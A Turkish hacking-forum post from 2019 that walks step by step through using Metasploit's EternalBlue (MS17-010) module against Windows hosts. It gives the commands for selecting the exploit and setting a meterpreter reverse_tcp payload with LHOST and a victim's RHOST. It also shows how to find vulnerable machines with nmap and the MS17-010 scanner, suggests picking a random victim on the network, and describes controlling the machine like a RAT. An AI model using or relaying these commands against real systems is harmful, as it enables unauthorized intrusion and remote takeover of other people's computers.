İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

EternalBlue Ve Kullanımı//StringingStroke

17-03-2019 15:44
#1
StringingStroke - ait Kullanıcı Resmi (Avatar)
Siber Güvenlik Ekibi
Üyelik tarihi:
01/2017
Nereden:
Bilinmiyor
Mesajlar:
595
Teşekkür (Etti):
239
Teşekkür (Aldı):
59
Konular:
54
Merhaba Dostlar!

Yeni bir konu ile karşınızdayım. Remote exploitler çok merak edilen bir konu ancak nasıl yapılacağı çok bilinmiyor.EternalBlue da o exploitlerden biri. Şimdi diyorsunuzki Remote exploit ne peki?
Remote Exploit: Adından da anlaşılacağı gibi uzak sistemlere yapılan Exploit türü diyebiliriz.
Exploit nedir bilmeyenler için bu linkten ulaşabilirsiniz.
EternalBlue, herkes tarafından bilinen Wannacry saldırısına sebep olan açıktır.
Bulunan sistemlerde açık muhakkak kapatılmalıdır kötü sonuçlar çıkabilir.
Evet peki bunu nasıl kullanırız diye soracaksınız.Öncelikle size ****sploit gerekli.Kali,Parrot,backtrack gibi işletim sistemlerinde zaten yüklü gelmektedir. ****sploit nedir ve kurulumu için yine Ceys komutanımızın bu konusundan inceleyebilirsiniz.
Konumuza geçelim...
Öncelikle terminalimize gelip msfconsole yazıyoruz ardından açılana kadar bekliyoruz.

Gelen ekrana
Kod:
use exploit/windows/smb/ms17_010_eternalblue
yazıyoruz.

Ardından eğer ki ratlardaki gibi kullanmak istiyorsanız şu komutu yazın.
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Eğer shell olarak kullanmak istiyorsanız bunu yazmanıza gerek yok.
Eğer bu payloadu yazdıysanız ardından şu komutuda girmeniz gerekli
Kod:
set LHOST ipv4_adresiniz

Evet tekrar ikisininde birleştiği yerdeyiz.
Kurbanımızın ipv4 adresini biliyorsak
Kod:
set RHOST kurabnın ipv4_adresi

eğer rastgele ağdan birini sçecekseniz veya ağdaki bilgisayarları görmek istiyorsanız farklı bir terminal açıp nmapin şu komutuyla bakabilirsiniz.
Kod:
nmap 192.168.1.0/24
Veya şu yöntemide deneyebilirsiniz:
İlk başta
Kod:
use auxiliary/scanner/smb/smb_ms17_010

diyip
Kod:
set RHOST IP_ARALIGI
Örneğin set RHOST 192.168.1.0/24
ardından run deyin.
burada beklerseniz açıklı ve açıksız makine olan ve olmayan makineleri söyleyecektir.
Ve yine RHOSTTAN sonraki yere kurbanınızı yazabilirsiniz.
Ardından exploit yazıp kurbanınızın düşmesini bekleyebilirsiniz ve aynı rat kurmuşcasına sistem üzerinde iş yapabilirsiniz.

Bende açıklı makine olmadığından gösteremeyeceğim.Ancak devamında meterpreter ekranı açılacak ve rat şeklinde kullanabileceksiniz.
NOT:
Windows 8 exploiti ayrıdır onun için
Kod:
use exploit/windows/smb/ms17_010_eternalblue_win8
ile aynı şekilde kullanabilirsiniz.

Kullanıcı İmzası
Karanlıklardır yerim zira aydınlıksa seni boğar
"Veni,Vidi,Vici"
Konu StringingStroke tarafından (17-03-2019 15:45 Saat 15:45 ) değiştirilmiştir.
"Tranquila, OniOz Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı